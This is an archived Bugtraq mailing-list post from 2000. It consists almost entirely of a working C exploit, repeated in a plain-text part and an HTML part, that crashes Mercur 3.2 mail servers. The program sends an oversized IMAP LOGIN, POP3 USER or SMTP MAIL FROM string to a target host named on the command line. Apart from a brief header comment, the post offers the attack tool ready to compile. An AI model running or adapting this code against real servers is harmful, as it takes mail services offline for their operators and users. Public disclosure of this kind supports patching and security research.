[15320] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post
Remote DoS for Mercur 3.2

daemon@ATHENA.MIT.EDU (|[TDP]|)
Wed Jun 14 14:44:27 2000

Mime-Version: 1.0
Content-Type: multipart/alternative;
              boundary="----=_NextPart_000_004B_01BFD568.060B9280"
Message-Id:  <004e01bfd557$42dfd6a0$01dc11ac@ofi.peoplecall.com>
Date:         Tue, 13 Jun 2000 18:48:54 +0200
Reply-To: "|[TDP]|" <tdp@psynet.net>
From: "|[TDP]|" <tdp@PSYNET.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

This is a multi-part message in MIME format.

------=_NextPart_000_004B_01BFD568.060B9280
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

/*
 * Remote Denial of Service for Mercur 3.2
 *=20
 * (C) |[TDP]|  - HaCk-13 TeaM -  2000      <tdp@psynet.net>
 *
 *
 * This code shows a Mercur 3.2 vulnerability in which, any remote
 * user can cause server shutdown. Previous Mercur versions may be
 * affected by this vulnerability.
 *
 * Greetings to all the other members and all my friends :)=20
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void
usage (char *progname)
{
  fprintf (stderr, "Usage: %s <hostname> [type]\n", progname);
  fprintf (stderr, "   Type:\n");
  fprintf (stderr, "      0 - IMAP4 (Default)\n");
  fprintf (stderr, "      1 - POP3\n");
  fprintf (stderr, "      2 - SMTP\n\n");
  exit (1);
}

int
main (int argc, char **argv)
{
  char *ptr, buffer[3000], remotedos[3100];
  int aux, sock, type;
  struct sockaddr_in sin;
  unsigned long ip;
  struct hostent *he;

  fprintf (stderr,
   "\n-=3D Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =3D-\n");

  if (argc < 2)
    usage (argv[0]);

  type =3D 0;
  if (argc > 2)
    type =3D atol (argv[2]);

  ptr =3D buffer;
  switch (type)
    {
    case 1:
      memset (ptr, 0, 2048);
      memset (ptr, 88, 2046);
      break;
    default:
      memset (ptr, 0, sizeof (buffer));
      memset (ptr, 88, sizeof (buffer) - 2);
      break;
    }

  bzero (remotedos, sizeof (remotedos));

  switch (type)
    {
    case 1:
      snprintf (remotedos, sizeof (remotedos), "USER %s\r\n\r\n\r\n", =
buffer);
      break;
    case 2:
      snprintf (remotedos, sizeof (remotedos),
"MAIL FROM: %s@ThiSiSaDoS.c0m\r\n\r\n\r\n", buffer);
      break;
    default:
      snprintf (remotedos, sizeof (remotedos), "1000 LOGIN =
%s\r\n\r\n\r\n",
buffer);
      break;
    }

  if ((sock =3D socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror ("socket()");
      return -1;
    }

  if ((he =3D gethostbyname (argv[1])) !=3D NULL)
    {
      ip =3D *(unsigned long *) he->h_addr;
    }
  else
    {
      if ((ip =3D inet_addr (argv[1])) =3D=3D NULL)
{
  perror ("inet_addr()");
  return -1;
}
    }

  sin.sin_family =3D AF_INET;
  sin.sin_addr.s_addr =3D ip;

  switch (type)
    {
    case 1:
      sin.sin_port =3D htons (110);
      break;
    case 2:
      sin.sin_port =3D htons (25);
      break;
    default:
      sin.sin_port =3D htons (143);
      break;
    }

  if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0)
    {
      perror ("connect()");
      return -1;
    }

  switch (type)
    {
    case 1:
      fprintf (stderr, "\nEngaged Mercur POP3... Sending data...\n");
      break;
    case 2:
      fprintf (stderr, "\nEngaged Mercur SMTP... Sending data...\n");
      break;
    default:
      fprintf (stderr, "\nEngaged Mercur IMAP4... Sending data...\n");
      break;
    }

  if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos))
    {
      perror ("write()");
      return -1;
    }

  sleep (4);

  fprintf (stderr, "Bye Bye baby!...\n\n");
  if (close (sock) < 0)
    {
      perror ("close()");
      return -1;
    }

  return (0);
}


------=_NextPart_000_004B_01BFD568.060B9280
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>/*<BR>&nbsp;* Remote Denial of Service =
for Mercur=20
3.2<BR>&nbsp;* <BR>&nbsp;* (C) |[TDP]|&nbsp; - HaCk-13 TeaM -&nbsp;=20
2000&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;<A=20
href=3D"mailto:tdp@psynet.net">tdp@psynet.net</A>&gt;<BR>&nbsp;*<BR>&nbsp=
;*<BR>&nbsp;*=20
This code shows a Mercur 3.2 vulnerability in which, any =
remote<BR>&nbsp;* user=20
can cause server shutdown. Previous Mercur versions may be<BR>&nbsp;* =
affected=20
by this vulnerability.<BR>&nbsp;*<BR>&nbsp;* Greetings to all the other =
members=20
and all my friends :) <BR>&nbsp;*/<BR><BR>#include =
&lt;stdio.h&gt;<BR>#include=20
&lt;stdlib.h&gt;<BR>#include &lt;unistd.h&gt;<BR>#include=20
&lt;sys/socket.h&gt;<BR>#include &lt;sys/types.h&gt;<BR>#include=20
&lt;netdb.h&gt;<BR>#include &lt;netinet/in.h&gt;<BR>#include=20
&lt;arpa/inet.h&gt;<BR><BR>void<BR>usage (char *progname)<BR>{<BR>&nbsp; =
fprintf=20
(stderr, "Usage: %s &lt;hostname&gt; [type]\n", progname);<BR>&nbsp; =
fprintf=20
(stderr, "&nbsp;&nbsp; Type:\n");<BR>&nbsp; fprintf (stderr,=20
"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0 - IMAP4 (Default)\n");<BR>&nbsp; =
fprintf=20
(stderr, "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1 - POP3\n");<BR>&nbsp; fprintf =

(stderr, "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2 - SMTP\n\n");<BR>&nbsp; exit=20
(1);<BR>}<BR><BR>int<BR>main (int argc, char **argv)<BR>{<BR>&nbsp; char =
*ptr,=20
buffer[3000], remotedos[3100];<BR>&nbsp; int aux, sock, type;<BR>&nbsp; =
struct=20
sockaddr_in sin;<BR>&nbsp; unsigned long ip;<BR>&nbsp; struct hostent=20
*he;<BR><BR>&nbsp; fprintf (stderr,<BR>&nbsp;&nbsp; "\n-=3D Remote DoS =
for Mercur=20
3.2 - (C) |[TDP]| - H13 Team =3D-\n");<BR><BR>&nbsp; if (argc &lt;=20
2)<BR>&nbsp;&nbsp;&nbsp; usage (argv[0]);<BR><BR>&nbsp; type =3D =
0;<BR>&nbsp; if=20
(argc &gt; 2)<BR>&nbsp;&nbsp;&nbsp; type =3D atol =
(argv[2]);<BR><BR>&nbsp; ptr =3D=20
buffer;<BR>&nbsp; switch (type)<BR>&nbsp;&nbsp;&nbsp; =
{<BR>&nbsp;&nbsp;&nbsp;=20
case 1:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset (ptr, 0,=20
2048);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset (ptr, 88,=20
2046);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
default:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset (ptr, 0, sizeof=20
(buffer));<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset (ptr, 88, sizeof =
(buffer) -=20
2);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; bzero (remotedos, sizeof (remotedos));<BR><BR>&nbsp; =
switch=20
(type)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp; case=20
1:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; snprintf (remotedos, sizeof =
(remotedos),=20
"USER %s\r\n\r\n\r\n", buffer);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
break;<BR>&nbsp;&nbsp;&nbsp; case 2:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
snprintf=20
(remotedos, sizeof (remotedos),<BR>"MAIL FROM: <A=20
href=3D'mailto:%s@ThiSiSaDoS.c0m\r\n\r\n\r\n"'>%s@ThiSiSaDoS.c0m\r\n\r\n\=
r\n"</A>,=20
buffer);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
default:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; snprintf (remotedos, sizeof=20
(remotedos), "1000 LOGIN=20
%s\r\n\r\n\r\n",<BR>buffer);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
break;<BR>&nbsp;&nbsp;&nbsp; }<BR><BR>&nbsp; if ((sock =3D socket =
(AF_INET,=20
SOCK_STREAM, IPPROTO_TCP)) &lt; 0)<BR>&nbsp;&nbsp;&nbsp;=20
{<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; perror=20
("socket()");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return =
-1;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; if ((he =3D gethostbyname (argv[1])) !=3D=20
NULL)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ip =3D =
*(unsigned=20
long *) he-&gt;h_addr;<BR>&nbsp;&nbsp;&nbsp; }<BR>&nbsp;=20
else<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ((ip =
=3D=20
inet_addr (argv[1])) =3D=3D NULL)<BR>{<BR>&nbsp; perror =
("inet_addr()");<BR>&nbsp;=20
return -1;<BR>}<BR>&nbsp;&nbsp;&nbsp; }<BR><BR>&nbsp; sin.sin_family =3D =

AF_INET;<BR>&nbsp; sin.sin_addr.s_addr =3D ip;<BR><BR>&nbsp; switch=20
(type)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp; case=20
1:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sin.sin_port =3D htons=20
(110);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp; =
case=20
2:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sin.sin_port =3D htons=20
(25);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
default:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sin.sin_port =3D htons=20
(143);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; if (connect (sock, (struct sockaddr *) &amp;sin, sizeof =
(sin))=20
&lt; 0)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; perror =

("connect()");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return=20
-1;<BR>&nbsp;&nbsp;&nbsp; }<BR><BR>&nbsp; switch =
(type)<BR>&nbsp;&nbsp;&nbsp;=20
{<BR>&nbsp;&nbsp;&nbsp; case 1:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
fprintf=20
(stderr, "\nEngaged Mercur POP3... Sending=20
data...\n");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
break;<BR>&nbsp;&nbsp;&nbsp; case=20
2:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf (stderr, "\nEngaged Mercur =
SMTP...=20
Sending data...\n");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
break;<BR>&nbsp;&nbsp;&nbsp; default:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
fprintf=20
(stderr, "\nEngaged Mercur IMAP4... Sending=20
data...\n");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
break;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; if (write (sock, remotedos, strlen (remotedos)) &lt; =
strlen=20
(remotedos))<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
perror=20
("write()");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return =
-1;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; sleep (4);<BR><BR>&nbsp; fprintf (stderr, "Bye Bye=20
baby!...\n\n");<BR>&nbsp; if (close (sock) &lt; 0)<BR>&nbsp;&nbsp;&nbsp; =

{<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; perror=20
("close()");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return =
-1;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; return (0);<BR>}<BR></FONT></DIV></BODY></HTML>

------=_NextPart_000_004B_01BFD568.060B9280--

home	help	back	first	fref	pref	prev	next	nref	lref	last	post
[15320] in bugtraq

Remote DoS for Mercur 3.2

daemon@ATHENA.MIT.EDU (|[TDP]|)Wed Jun 14 14:44:27 2000

daemon@ATHENA.MIT.EDU (|[TDP]|)
Wed Jun 14 14:44:27 2000
